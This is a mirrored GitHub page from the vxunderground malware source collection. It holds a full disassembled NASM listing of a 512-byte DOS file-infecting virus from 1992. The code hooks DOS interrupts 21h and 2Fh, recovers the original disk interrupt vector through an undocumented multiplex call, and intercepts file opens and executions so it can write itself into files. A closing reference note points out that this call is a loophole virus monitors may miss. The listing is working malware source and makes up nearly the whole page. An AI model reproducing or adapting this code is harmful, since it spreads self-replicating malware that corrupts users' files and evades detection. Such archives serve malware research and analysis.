mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
4b9382ddbc
push
305 lines
11 KiB
NASM
305 lines
11 KiB
NASM
;NAME: 512-X.C-M
|
|
;FILE SIZE: 00200h - 512d
|
|
;START (CS:IP): 00100h
|
|
;CODE END: 00300h
|
|
;CODE ORIGIN: 00100h
|
|
;DATE: Wed Aug 05 13:56:29 1992
|
|
|
|
CODE SEGMENT BYTE PUBLIC 'CODE'
|
|
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
|
|
|
|
P00100 PROC
|
|
ORG 0100h
|
|
|
|
H00100: MOV AH,30h ;00100 B430 _0
|
|
INT 21h ;2-DOS_Ver ;00102 CD21 _!
|
|
MOV SI,0004h ;00104 BE0400 ___
|
|
MOV DS,SI ;DS_Chg ;00107 8EDE __
|
|
CMP AH,1Eh ;00109 80FC1E ___
|
|
LDS AX,[SI+08h] ;0010C C54408 _D_
|
|
JB H0011B ;0010F 720A r_
|
|
MOV AH,13h ;00111 B413 __
|
|
INT 2Fh ;3-Prt_Splr_Ctrl ;00113 CD2F _/
|
|
PUSH DS ;00115 1E _
|
|
PUSH DX ;00116 52 R
|
|
INT 2Fh ;3-Prt_Splr_Ctrl ;00117 CD2F _/
|
|
POP AX ;00119 58 X
|
|
POP DS ;0011A 1F _
|
|
H0011B: MOV DI,00F8h ;0011B BFF800 ___
|
|
STOSW ;0011E AB _
|
|
MOV AX,DS ;0011F 8CD8 __
|
|
STOSW ;00121 AB _
|
|
MOV DS,SI ;DS_Chg ;00122 8EDE __
|
|
LDS AX,[SI+40h] ;00124 C54440 _D@
|
|
STOSW ;00127 AB _
|
|
CMP AX,0121h ;00128 3D2101 =!_
|
|
MOV AX,DS ;0012B 8CD8 __
|
|
STOSW ;0012D AB _
|
|
PUSH ES ;0012E 06 _
|
|
PUSH DI ;0012F 57 W
|
|
JNZ H00139 ;00130 7507 u_
|
|
SHL SI,1 ;00132 D1E6 __
|
|
MOV CX,0100h ;00134 B90001 ___
|
|
REPZ CMPSW ;00137 F3A7 __
|
|
H00139: PUSH CS ;00139 0E _
|
|
POP DS ;0013A 1F _
|
|
JZ H00187 ;0013B 744A tJ
|
|
MOV AH,52h ;0013D B452 _R
|
|
INT 21h ;2-Rsvd_INT:21h-52h ;0013F CD21 _!
|
|
PUSH ES ;00141 06 _
|
|
MOV SI,00F8h ;00142 BEF800 ___
|
|
SUB DI,DI ;00145 2BFF +_
|
|
LES AX,ES:[BX+12h] ;ES_Ovrd ;00147 26C44712 &_G_
|
|
MOV DX,ES:[DI+02h] ;ES_Ovrd ;0014B 268B5502 &_U_
|
|
MOV CX,0104h ;0014F B90401 ___
|
|
REPZ MOVSW ;00152 F3A5 __
|
|
MOV DS,CX ;DS_Chg ;00154 8ED9 __
|
|
MOV DI,0016h ;00156 BF1600 ___
|
|
MOV Word Ptr [DI+6Eh],0121h ;00159 C7456E2101 _En!_
|
|
MOV [DI+70h],ES ;0015E 8C4570 _Ep
|
|
POP DS ;00161 1F _
|
|
MOV [BX+14h],DX ;00162 895714 _W_
|
|
MOV DX,CS ;00165 8CCA __
|
|
MOV DS,DX ;DS_Chg ;00167 8EDA __
|
|
MOV BX,[DI-14h] ;00169 8B5DEC _]_
|
|
DEC BH ;0016C FECF __
|
|
MOV ES,BX ;ES_Chg ;0016E 8EC3 __
|
|
CMP DX,[DI] ;00170 3B15 ;_
|
|
MOV DS,[DI] ;DS_Chg ;00172 8E1D __
|
|
MOV DX,[DI] ;00174 8B15 __
|
|
DEC DX ;00176 4A J
|
|
MOV DS,DX ;DS_Chg ;00177 8EDA __
|
|
MOV SI,CX ;00179 8BF1 __
|
|
MOV DX,DI ;0017B 8BD7 __
|
|
MOV CL,28h ;0017D B128 _(
|
|
REPZ MOVSW ;0017F F3A5 __
|
|
MOV DS,BX ;DS_Chg ;00181 8EDB __
|
|
JB H00197 ;00183 7212 r_
|
|
INT 20h ;B-TERM_norm:20h ;00185 CD20 _
|
|
;---------------------------------------------------
|
|
H00187: MOV SI,CX ;00187 8BF1 __
|
|
MOV DS,[SI+2Ch] ;DS_Chg ;00189 8E5C2C _\,
|
|
LODSW ;0018C AD _
|
|
DEC SI ;0018D 4E N
|
|
TEST AX,AX ;0018E 85C0 __
|
|
JNZ H0018C ;00190 75FA u_
|
|
ADD SI,+03h ;00192 83C603 ___
|
|
MOV DX,SI ;00195 8BD6 __
|
|
H00197: MOV AH,3Dh ;00197 B43D _=
|
|
CALL H001B0 ; . . . . . . . . . ;00199 E81400 ___
|
|
MOV DX,[DI] ;0019C 8B15 __
|
|
MOV [DI+04h],DX ;0019E 895504 _U_
|
|
ADD [DI],CX ;001A1 010D __
|
|
POP DX ;001A3 5A Z
|
|
PUSH DX ;001A4 52 R
|
|
PUSH CS ;001A5 0E _
|
|
POP ES ;001A6 07 _
|
|
PUSH CS ;001A7 0E _
|
|
POP DS ;001A8 1F _
|
|
PUSH DS ;001A9 1E _
|
|
MOV AL,50h ;001AA B050 _P
|
|
PUSH AX ;001AC 50 P
|
|
MOV AH,3Fh ;001AD B43F _?
|
|
RET ;RET_Far ;001AF CB _
|
|
;---------------------------------------------------
|
|
H001B0: INT 21h ;Indef_INT:21h-AH ;001B0 CD21 _!
|
|
JB H001CD ;001B2 7219 r_
|
|
MOV BX,AX ;001B4 8BD8 __
|
|
PUSH BX ;001B6 53 S
|
|
MOV AX,1220h ;001B7 B82012 _ _
|
|
INT 2Fh ;3-Prt_Splr_Ctrl ;001BA CD2F _/
|
|
MOV BL,ES:[DI] ;ES_Ovrd ;001BC 268A1D &__
|
|
MOV AX,1216h ;001BF B81612 ___
|
|
INT 2Fh ;3-Prt_Splr_Ctrl ;001C2 CD2F _/
|
|
POP BX ;001C4 5B [
|
|
PUSH ES ;001C5 06 _
|
|
POP DS ;001C6 1F _
|
|
ADD DI,+11h ;001C7 83C711 ___
|
|
MOV CX,0200h ;001CA B90002 ___
|
|
H001CD: RET ;RET_Near ;001CD C3 _
|
|
;---------------------------------------------------
|
|
STI ;001CE FB _
|
|
PUSH ES ;001CF 06 _
|
|
PUSH SI ;001D0 56 V
|
|
PUSH DI ;001D1 57 W
|
|
PUSH BP ;001D2 55 U
|
|
PUSH DS ;001D3 1E _
|
|
PUSH CX ;001D4 51 Q
|
|
CALL H001B6 ; . . . . . . . . . ;001D5 E8DEFF ___
|
|
MOV BP,CX ;001D8 8BE9 __
|
|
MOV SI,[DI+04h] ;001DA 8B7504 _u_
|
|
POP CX ;001DD 59 Y
|
|
POP DS ;001DE 1F _
|
|
CALL H00211 ; . . . . . . . . . ;001DF E82F00 _/_
|
|
JB H0020A ;001E2 7226 r&
|
|
CMP SI,BP ;001E4 3BF5 ;_
|
|
JNB H0020A ;001E6 7322 s"
|
|
PUSH AX ;001E8 50 P
|
|
MOV AL,ES:[DI-04h] ;ES_Ovrd ;001E9 268A45FC &_E_
|
|
NOT AL ;001ED F6D0 __
|
|
AND AL,1Fh ;001EF 241F $_
|
|
JNZ H00209 ;001F1 7516 u_
|
|
ADD SI,ES:[DI] ;ES_Ovrd ;001F3 260335 &_5
|
|
XCHG SI,ES:[DI+04h] ;ES_Ovrd ;001F6 26877504 &_u_
|
|
ADD ES:[DI],BP ;ES_Ovrd ;001FA 26012D &_-
|
|
CALL H00211 ; . . . . . . . . . ;001FD E81100 ___
|
|
MOV ES:[DI+04h],SI ;ES_Ovrd ;00200 26897504 &_u_
|
|
LAHF ;00204 9F _
|
|
SUB ES:[DI],BP ;ES_Ovrd ;00205 26292D &)-
|
|
SAHF ;00208 9E _
|
|
H00209: POP AX ;00209 58 X
|
|
H0020A: POP BP ;0020A 5D ]
|
|
POP DI ;0020B 5F _
|
|
POP SI ;0020C 5E ^
|
|
POP ES ;0020D 07 _
|
|
RET 0002h ;RET_Far:0002h ;0020E CA0200 ___
|
|
;---------------------------------------------------
|
|
H00211: MOV AH,3Fh ;00211 B43F _?
|
|
PUSHF ;00213 9C _
|
|
PUSH CS ;00214 0E _
|
|
CALL H0023A ; . . . . . . . . . ;00215 E82200 _"_
|
|
RET ;RET_Near ;00218 C3 _
|
|
;---------------------------------------------------
|
|
CMP AH,3Fh ;00219 80FC3F __?
|
|
JZ H001CE ;0021C 74B0 t_
|
|
PUSH DS ;0021E 1E _
|
|
PUSH ES ;0021F 06 _
|
|
PUSH AX ;00220 50 P
|
|
PUSH BX ;00221 53 S
|
|
PUSH CX ;00222 51 Q
|
|
PUSH DX ;00223 52 R
|
|
PUSH SI ;00224 56 V
|
|
PUSH DI ;00225 57 W
|
|
CMP AH,3Eh ;00226 80FC3E __>
|
|
JZ H0023F ;00229 7414 t_
|
|
CMP AX,4B00h ;0022B 3D004B =_K
|
|
MOV AH,3Dh ;0022E B43D _=
|
|
JZ H00241 ;00230 740F t_
|
|
POP DI ;00232 5F _
|
|
POP SI ;00233 5E ^
|
|
POP DX ;00234 5A Z
|
|
POP CX ;00235 59 Y
|
|
POP BX ;00236 5B [
|
|
POP AX ;00237 58 X
|
|
POP ES ;00238 07 _
|
|
POP DS ;00239 1F _
|
|
H0023A: JMP Word Ptr CS:[0004h]
|
|
;Mem_Brch:CS:[0004h];0023A 2EFF2E0400 ._.__
|
|
;---------------------------------------------------
|
|
H0023F: MOV AH,45h ;0023F B445 _E
|
|
H00241: CALL H001B0 ; . . . . . . . . . ;00241 E86CFF _l_
|
|
JB H00232 ;00244 72EC r_
|
|
SUB AX,AX ;00246 2BC0 +_
|
|
MOV [DI+04h],AX ;00248 894504 _E_
|
|
MOV Byte Ptr [DI-0Fh],02h ;0024B C645F102 _E__
|
|
CLD ;0024F FC _
|
|
MOV DS,AX ;DS_Chg ;00250 8ED8 __
|
|
MOV SI,004Ch ;00252 BE4C00 _L_
|
|
LODSW ;00255 AD _
|
|
PUSH AX ;00256 50 P
|
|
LODSW ;00257 AD _
|
|
PUSH AX ;00258 50 P
|
|
PUSH [SI+40h] ;00259 FF7440 _t@
|
|
PUSH [SI+42h] ;0025C FF7442 _tB
|
|
LDS DX,CS:[SI-50h] ;CS_Ovrd ;0025F 2EC554B0 ._T_
|
|
MOV AX,2513h ;00263 B81325 __%
|
|
INT 21h ;1-Set_Int_Vctr ;00266 CD21 _!
|
|
PUSH CS ;00268 0E _
|
|
POP DS ;00269 1F _
|
|
MOV DX,0204h ;0026A BA0402 ___
|
|
MOV AL,24h ;0026D B024 _$
|
|
INT 21h ;Indef_INT:21h-25h ;0026F CD21 _!
|
|
PUSH ES ;00271 06 _
|
|
POP DS ;00272 1F _
|
|
MOV AL,[DI-04h] ;00273 8A45FC _E_
|
|
AND AL,1Fh ;00276 241F $_
|
|
CMP AL,1Fh ;00278 3C1F <_
|
|
JZ H00284 ;0027A 7408 t_
|
|
MOV AX,[DI+17h] ;0027C 8B4517 _E_
|
|
SUB AX,4F43h ;0027F 2D434F -CO
|
|
JNZ H002C3 ;00282 753F u?
|
|
H00284: XOR [DI-04h],AL ;00284 3045FC 0E_
|
|
MOV AX,[DI] ;00287 8B05 __
|
|
CMP AX,CX ;00289 3BC1 ;_
|
|
;---------------------------------------------------
|
|
DB "r6" ;0028B 7236
|
|
;---------------------------------------------------
|
|
ADD AX,CX ;0028D 03C1 __
|
|
JB H002C3 ;0028F 7232 r2
|
|
TEST Byte Ptr [DI-0Dh],04h ;00291 F645F304 _E__
|
|
JNZ H002C3 ;00295 752C u,
|
|
LDS SI,[DI-0Ah] ;00297 C575F6 _u_
|
|
DEC AX ;0029A 48 H
|
|
SHR AH,1 ;0029B D0EC __
|
|
AND AH,[SI+04h] ;0029D 226404 "d_
|
|
JZ H002C3 ;002A0 7421 t!
|
|
MOV AX,0020h ;002A2 B82000 _ _
|
|
MOV DS,AX ;DS_Chg ;002A5 8ED8 __
|
|
SUB DX,DX ;002A7 2BD2 +_
|
|
CALL H00211 ; . . . . . . . . . ;002A9 E865FF _e_
|
|
MOV SI,DX ;002AC 8BF2 __
|
|
PUSH CX ;002AE 51 Q
|
|
LODSB ;002AF AC _
|
|
CMP AL,CS:[SI+07h] ;CS_Ovrd ;002B0 2E3A4407 .:D_
|
|
JNZ H002DD ;002B4 7527 u'
|
|
LOOP H002AF ;002B6 E2F7 __
|
|
POP CX ;002B8 59 Y
|
|
OR Byte Ptr ES:[DI-04h],1Fh
|
|
;ES_Ovrd ;002B9 26804DFC1F &_M__
|
|
OR Byte Ptr ES:[DI-0Bh],40h
|
|
;ES_Ovrd ;002BE 26804DF540 &_M_@
|
|
H002C3: MOV AH,3Eh ;002C3 B43E _>
|
|
CALL H00213 ; . . . . . . . . . ;002C5 E84BFF _K_
|
|
OR Byte Ptr ES:[DI-0Ch],40h
|
|
;ES_Ovrd ;002C8 26804DF440 &_M_@
|
|
POP DS ;002CD 1F _
|
|
POP DX ;002CE 5A Z
|
|
MOV AX,2524h ;002CF B82425 _$%
|
|
INT 21h ;1-Set_Int_Vctr ;002D2 CD21 _!
|
|
POP DS ;002D4 1F _
|
|
POP DX ;002D5 5A Z
|
|
MOV AL,13h ;002D6 B013 __
|
|
INT 21h ;Indef_INT:21h-25h ;002D8 CD21 _!
|
|
JMP H00232 ;002DA E955FF _U_
|
|
;---------------------------------------------------
|
|
H002DD: POP CX ;002DD 59 Y
|
|
MOV SI,ES:[DI] ;ES_Ovrd ;002DE 268B35 &_5
|
|
MOV ES:[DI+04h],SI ;ES_Ovrd ;002E1 26897504 &_u_
|
|
MOV AH,40h ;002E5 B440 _@
|
|
INT 21h ;2-Wr_Fl_Hdl ;002E7 CD21 _!
|
|
JB H002BE ;002E9 72D3 r_
|
|
MOV ES:[DI],SI ;ES_Ovrd ;002EB 268935 &_5
|
|
MOV ES:[DI+04h],DX ;ES_Ovrd ;002EE 26895504 &_U_
|
|
PUSH CS ;002F2 0E _
|
|
POP DS ;002F3 1F _
|
|
MOV DL,08h ;002F4 B208 __
|
|
MOV AH,40h ;002F6 B440 _@
|
|
INT 21h ;2-Wr_Fl_Hdl ;002F8 CD21 _!
|
|
JMP Short H002B9 ;002FA EBBD __
|
|
;---------------------------------------------------
|
|
IRET ;002FC CF _
|
|
;---------------------------------------------------
|
|
DB "666" ;002FD 363636
|
|
;---------------------------------------------------
|
|
|
|
|
|
P00100 ENDP
|
|
|
|
CODE ENDS
|
|
END H00100
|
|
|
|
;-------------------------------------------------------------------------------
|
|
|
|
INT 2F - Multiplex - DOS 3.3+ - SET DISK INTERRUPT HANDLER
|
|
AH = 13h
|
|
DS:DX -> interrupt handler disk driver calls on read/write
|
|
ES:BX = address to restore INT 13 to on system halt (exit from root
|
|
shell)
|
|
Return: DS:DX from previous invocation of this function
|
|
ES:BX from previous invocation of this function
|
|
Notes: most DOS 3.3+ disk access is via the vector in DS:DX, although a few
|
|
functions are still invoked via an INT 13 instruction
|
|
this is a dangerous security loophole for any virus-monitoring software
|
|
which does not trap this call (at least two viruses are known to use
|
|
it to get the original ROM entry point)
|